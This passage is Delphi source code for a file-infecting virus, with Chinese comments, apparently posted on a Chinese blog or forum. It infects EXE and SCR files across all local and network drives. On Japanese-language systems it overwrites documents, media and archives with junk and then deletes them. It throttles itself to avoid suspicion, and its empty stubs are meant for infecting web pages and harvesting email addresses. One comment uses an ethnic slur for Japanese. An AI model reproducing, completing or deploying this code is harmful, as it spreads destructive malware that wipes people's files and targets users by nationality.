// 写入已感染的标记
DstStream.Seek( 0 , 2 );
iID : = $ 44444444 ;
DstStream.Write(iID, 4 );
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); // 替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string );
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0 ); // 去掉只读属性
FileHandle : = FileOpen(FileName, fmOpenWrite); // 打开文件
try
Size : = GetFileSize(FileHandle, nil); // 文件大小
i : = 0 ;
Randomize;
Max : = Random( 15 ); // 写入垃圾码的随机次数
if Max < 5 then
Max : = 5 ;
Mass : = Size div Max; // 每个间隔块的大小
Len : = Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0 ); // 定位
// 写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); // 关闭文件
end;
DeleteFile(PChar(FileName)); // 删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string ;
var
DiskType: Word;
D: Char;
Str: string ;
i: Integer;
begin
for i : = 0 to 25 do // 遍历26个字母
begin
D : = Chr(i + 65 );
Str : = D + ’ :';
DiskType : = GetDriveType(PChar(Str));
// 得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result : = Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string );
var
i, Count: Integer;
Fn, Ext: string ;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr <> 16 ) and (SearchRec.Name <> ’ . ’ ) and
(SearchRec.Name <> ’ … ’ ) then
Result : = 0 // 不是目录
else if (SearchRec.Attr = 16 ) and (SearchRec.Name <> ’ . ’ ) and
(SearchRec.Name <> ’ … ’ ) then
Result : = 1 // 不是根目录
else Result : = 2 ; // 是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0 ) then
begin
repeat
PeekMessage(Msg, 0 , 0 , 0 , PM_REMOVE); // 调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn : = Path + SearchRec.Name;
Ext : = UpperCase(ExtractFileExt(Fn));
if (Ext = ’ .EXE ’ ) or (Ext = ’ .SCR ’ ) then
begin
InfectOneFile(Fn); // 感染可执行文件
end
else if (Ext = ’ .HTM ’ ) or (Ext = ’ .HTML ’ ) or (Ext = ’ .ASP ’ ) then
begin
// 感染HTML和ASP文件,将Base64编码后的病毒写入
// 感染浏览此网页的所有用户
// 哪位大兄弟愿意完成之?
end
else if Ext = ’ .WAB ’ then // Outlook地址簿文件
begin
// 获取Outlook邮件地址
end
else if Ext = ’ .ADC ’ then // Foxmail地址自动完成文件
begin
// 获取Foxmail邮件地址
end
else if Ext = ’ IND ’ then // Foxmail地址簿文件
begin
// 获取Foxmail邮件地址
end
else
begin
if IsJap then // 是倭文操作系统
begin
if (Ext = ’ .DOC ’ ) or (Ext = ’ .XLS ’ ) or (Ext = ’ .MDB ’ ) or
(Ext = ’ .MP3 ’ ) or (Ext = ’ .RM ’ ) or (Ext = ’ .RA ’ ) or
(Ext = ’ .WMA ’ ) or (Ext = ’ .ZIP ’ ) or (Ext = ’ .RAR ’ ) or
(Ext = ’ .MPEG ’ ) or (Ext = ’ .ASF ’ ) or (Ext = ’ .JPG ’ ) or
(Ext = ’ .JPEG ’ ) or (Ext = ’ .GIF ’ ) or (Ext = ’ .SWF ’ ) or
(Ext = ’ .PDF ’ ) or (Ext = ’ .CHM ’ ) or (Ext = ’ .AVI ’ ) then
SmashFile(Fn); // 摧毁文件
end;
end;
end;
// 感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep( 200 );
until (FindNext(SearchRec) <> 0 );
end;
FindClose(SearchRec);
SubDir : = TStringList.Create;
if (FindFirst(Path + ’ . ’ , faDirectory, SearchRec) = 0 ) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0 );
end;
FindClose(SearchRec);
Count : = SubDir.Count - 1 ;
for i : = 0 to Count do
LoopFiles(Path + SubDir.Strings + ’ ', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
